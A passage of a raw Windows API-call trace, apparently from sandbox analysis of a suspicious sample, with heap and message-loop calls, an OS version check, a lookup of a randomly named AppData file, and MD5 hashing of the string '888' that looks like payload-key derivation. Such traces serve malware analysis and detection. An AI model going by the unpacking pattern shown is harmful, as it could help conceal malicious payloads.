dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0149.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0149.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0149.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0149.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0149.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0149.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0149.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.928] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.928] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/rCxPhCicoc5u7sEbYlz.ots", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b1dd180, ftCreationTime.dwHighDateTime=0x1d5d285, ftLastAccessTime.dwLowDateTime=0x24619f50, ftLastAccessTime.dwHighDateTime=0x1d5c7a0, ftLastWriteTime.dwLowDateTime=0x24619f50, ftLastWriteTime.dwHighDateTime=0x1d5c7a0, nFileSizeHigh=0x0, nFileSizeLow=0x942f, dwReserved0=0x0, dwReserved1=0x0, cFileName="rCxPhCicoc5u7sEbYlz.ots", cAlternateFileName="RCXPHC~1.OTS")) returned 0x9e2078 [0149.928] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0149.929] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.929] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.929] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.929] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.929] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.929] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.929] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.929] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.929] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.929] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0149.929] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.929] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0149.930] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.930] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.930] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.930] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0149.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0149.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.930] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.930] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0149.930] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.930] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0149.930] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0149.930] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0149.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0149.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7140, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0149.931] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf550) returned 1 [0149.931] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.931] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.931] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0149.931] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.931] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0149.931] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.931] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.931] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.932] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.932] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.932] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.932] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.932] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0149.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.932] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0149.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.932] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.933] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.933] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.933] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.933] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.933] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.933] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.933] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.933] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.933] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.933] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.933] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.933] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.933] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.933] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.933] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.933] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.933] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.933] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.933] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.933] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.933] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.933] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.934] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.934] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.934] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.934] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.934] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.934] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.934] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa4b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0149.934] CryptCreateHash (in: hProv=0x9bf550, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0149.934] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.934] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.934] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.934] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0149.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0149.934] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0149.934] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0149.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0149.934] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.935] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.935] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.935] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.935] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.935] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.935] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0149.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa300, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0149.935] CryptHashData (hHash=0x9e20f8, pbData=0x2a71c18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0149.935] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.935] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.935] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.935] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.935] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.935] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.935] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.935] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.935] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.935] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.935] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.937] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.938] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.938] 